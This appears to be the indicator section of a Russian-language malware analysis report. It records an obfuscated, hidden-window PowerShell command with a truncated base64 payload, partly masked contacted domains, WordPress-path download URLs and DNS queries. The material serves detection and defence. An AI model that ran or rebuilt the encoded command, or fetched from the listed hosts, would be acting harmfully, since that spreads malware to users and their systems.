Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABLAHQAdwB5AGQAaABhAGkAdgBjAG4AbgA9ACcARQB6AHAAdwBxAGgAcwBpACcAOwAkAFkAYgBxAHUAYwBiAGcAYwBxAHoAZwAgAD...
- 'hi####48blog.biz':80
- 'ba####salama.com':80
- 'so#####npoolcare.com':80
- 'te######ndirectsales.com':443
- http://www.ba####salama.com/wp-admin/e86sz-rcpcihz-16085175/
- http://so#####npoolcare.com/central.function/xvt-iqa0qu-6812406689/
- DNS ASK hi####48blog.biz
- DNS ASK ba####salama.com
- DNS ASK ho####cietepromo.ca
- DNS ASK so#####npoolcare.com
- DNS ASK te######ndirectsales.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABLAHQAdwB5AGQAaABhAGkAdgBjAG4AbgA9ACcARQB6AHAAdwBxAGgAcwBpACcAOwAkAFkAYgBxAHUAYwBiAGcAYwBxAHoAZwAgAD...' (со скрытым окном)